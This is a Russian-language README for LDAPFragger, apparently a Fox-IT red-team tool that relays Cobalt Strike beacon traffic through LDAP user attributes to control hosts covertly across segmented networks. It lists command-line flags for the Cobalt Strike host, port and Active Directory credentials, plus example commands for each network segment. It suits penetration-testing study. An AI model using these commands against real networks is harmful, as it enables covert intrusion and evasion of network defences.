
Инструмент C2, маршрутизирующий данные бикона Cobalt Strike через атрибуты пользователей LDAP для скрытного управления и контроля в сегментированных сетях.
LDAPFragger — это инструмент управления и контроля (C2), который позволяет злоумышленникам направлять данные маяка Cobalt Strike через LDAP, используя атрибуты пользователей.
Для получения справочной информации прочитайте блог о релизе: http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes
.NET 4.0, но может работать и с более старыми и новыми версиями .NET _ _ __
| | | | / _|
| | __| | __ _ _ __ | |_ _ __ __ _ __ _ __ _ ___ _ __
| |/ _` |/ _` | '_ \| _| '__/ _` |/ _` |/ _` |/ _ \ '__|
| | (_| | (_| | |_) | | | | | (_| | (_| | (_| | __/ |
|_|\__,_|\__,_| .__/|_| |_| \__,_|\__, |\__, |\___|_|
| | __/ | __/ |
|_| |___/ |___/
Fox-IT - Rindert Kramer
Использование:
--cshost: IP-адрес или имя хоста экземпляра Cobalt Strike
--csport: Порт внешнего интерфейса C2 на сервере Cobalt Strike
-u: Имя пользователя для подключения к Active Directory
-p: Пароль для подключения к Active Directory
-d: FQDN домена Active Directory
--ldaps: Использовать LDAPS вместо LDAP
-v: Подробный вывод
-h: Показать это сообщение
Если учетные данные AD не указаны, будет использоваться интегрированная аутентификация AD.
Пример использования:

Из сетевого сегмента A выполните:
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>
Из сетевого сегмента B выполните:
LDAPFragger
LDAPFragger -u <username> -p <password> -d <domain FQDN>
LDAPS можно использовать с флагом --LDAPS, однако обычный LDAP-трафик также шифруется. Обратите внимание, что стандартная полезная нагрузка Cobalt Strike будет обнаружена большинством антивирусов.